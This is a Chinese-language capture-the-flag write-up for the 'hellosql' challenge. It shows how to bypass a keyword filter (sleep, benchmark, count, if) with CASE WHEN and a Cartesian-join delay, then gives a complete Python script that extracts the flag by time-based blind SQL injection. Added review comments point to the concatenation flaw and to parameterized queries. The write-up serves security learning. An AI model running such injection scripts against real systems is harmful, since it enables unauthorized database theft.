2023巅峰极客hellosql writeup
经过简单fuzz一下发现过滤了
* sleep union benchmark count if
为什么偏偏就过滤和时间盲注有关的关键词呢,我感觉是考时间盲注的bypass,禁用了sleep,benchmark和count(*)
,想到了get_lock,而这题考的就是笛卡尔积,碰到知识盲区了没做出来,赛后学了一下笛卡尔积时间盲注,查漏补缺了一下时间盲注的方法,都写在我博客的这篇文章《时间盲注的方法》里了
if过滤用case…when…then…end代替,count(*)
可以用其他的聚合函数(avg,sum,min,max)绕过,这里用max
import requests
import time
# Challenge endpoint from the writeup; the injectable parameter is `id`,
# sent as a GET query-string value below.
# NOTE(review): the underlying defect is that `id` is concatenated into the
# SQL statement.  The keyword denylist described above (sleep / benchmark /
# count / if) does not close it, as the bypass below shows; parameterized
# queries remove this whole class of issue regardless of the filter.
url = 'http://web-83bfbb55f8.challenge.xctf.org.cn/index.php'
flag = ''  # one recovered character is appended per outer iteration
# Recover up to 99 characters; SUBSTR() positions are 1-based, hence range(1, 100).
for i in range(1, 100):
    # Binary search over the printable ASCII range [32, 127] for the
    # character at position i of the target string.
    high = 127
    low = 32
    mid = (low + high) // 2
    while high > low:
        # The two commented-out payloads are the earlier enumeration steps
        # (table name, then column name); only the third payload is live.
        #payload = "' or case when ascii(SUBSTR((select(group_concat(table_name))from(information_schema.tables)where(table_schema)=database()),{},1))>{} then (select MAX(A.TABLE_NAME) from information_schema.columns A, information_schema.columns B) END#".format(i, mid) # table name is Flllag
        #payload = "' or case when ascii(SUBSTR((select(group_concat(column_name))from(information_schema.columns)where(table_name)='Flllag'),{},1))>{} then (select MAX(A.TABLE_NAME) from information_schema.columns A, information_schema.columns B) END#".format(i, mid) # the only column is Flagg
        # CASE ... WHEN ... THEN ... END stands in for the filtered IF(); the
        # THEN branch runs a Cartesian self-join of information_schema.columns
        # (MAX() standing in for the filtered COUNT(*)), so a true comparison
        # shows up purely as response delay.
        payload = "' or case when ascii(SUBSTR((select(group_concat(Flagg))from(Flllag)),{},1))>{} then (select MAX(A.TABLE_NAME) from information_schema.columns A, information_schema.columns B) END#".format(i, mid) # dump the data
        data = {"id": payload, }
        last = time.time()
        # Only the round-trip time is used; the response body is never read.
        response = requests.get(url, params=data)
        now = time.time()
        # A delay of at least 0.5 s is interpreted as ascii(char) > mid.
        # NOTE(review): the threshold is fixed and the request has no timeout
        # or retry, so network jitter can flip one comparison and corrupt the
        # remainder of the search for this position.
        if now - last >= 0.5:
            low = mid + 1
        else:
            high = mid
        mid = (low + high) // 2
    # If the search collapsed onto either boundary, presumably no character
    # exists at this position (end of the string) — stop.
    if mid==32 or mid==127:
        break
    print(i)
    flag += chr(mid)
    print("flag:" + flag)
print(flag)